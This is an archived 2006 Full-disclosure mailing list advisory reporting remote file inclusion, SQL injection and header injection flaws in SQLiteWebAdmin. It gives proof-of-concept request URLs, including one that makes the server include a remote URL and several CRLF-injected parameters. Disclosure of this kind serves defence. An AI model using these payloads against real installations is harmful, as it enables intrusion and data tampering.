Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) [Full-disclosure] Content Management Framework "G3" - XSS Vulnerability in Search Function [Full-disclosure] X-Statics 1.20 SQL Injection Vulnerability [Full-disclosure] X-Protection 1.10 SQL Injection Vulnerability [Full-disclosure] X-Poll SQL Injection Vulnerability From:Eduardo Vela <sirdarckcat_(at)_gmail.com> Date:02.08.2006Subject:[Full-disclosure] SQLiteWebAdmin multiple VulnerabilitiesDiscovered by Sirdarckcat from elhacker.net SQLiteWebAdmin http://sourceforge.net/projects/sqlitewebadmin ============================================== SQLiteWebAdmin is a simple script for managing a DataBase. It has several security bugs. ============================================== Remote File Inclusion: PoC: http://www.server.com/lib/tpl.inc.php?conf[classpath]=http://www.google.com/? ============================================== SQLinjection: PoC: http://www.server.com/table_editfield.php?table='+[SQL] ============================================== And also Header Injection: PoC: http://www.server.com/table_editfield.php?table=%0D%0AHeader1:+value PoC: http://www.server.com/table_dropindex.php?table=%0D%0AHeader1:+value PoC: http://www.server.com/table_dropfield.php?table=%0D%0AHeader1:+value PoC: http://www.server.com/table_addindex.php?table=%0D%0AHeader1:+value PoC: http://www.server.com/table_addfield.php?table=%0D%0AHeader1:+value PoC: http://www.server.com/database_addtable.php?table=%0D%0AHeader1:+value ============================================== Att. Sirdarckcat elhacker.net
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
[Full-disclosure] Content Management Framework "G3" - XSS Vulnerability in Search Function
[Full-disclosure] X-Statics 1.20 SQL Injection Vulnerability
[Full-disclosure] X-Protection 1.10 SQL Injection Vulnerability
[Full-disclosure] X-Poll SQL Injection Vulnerability
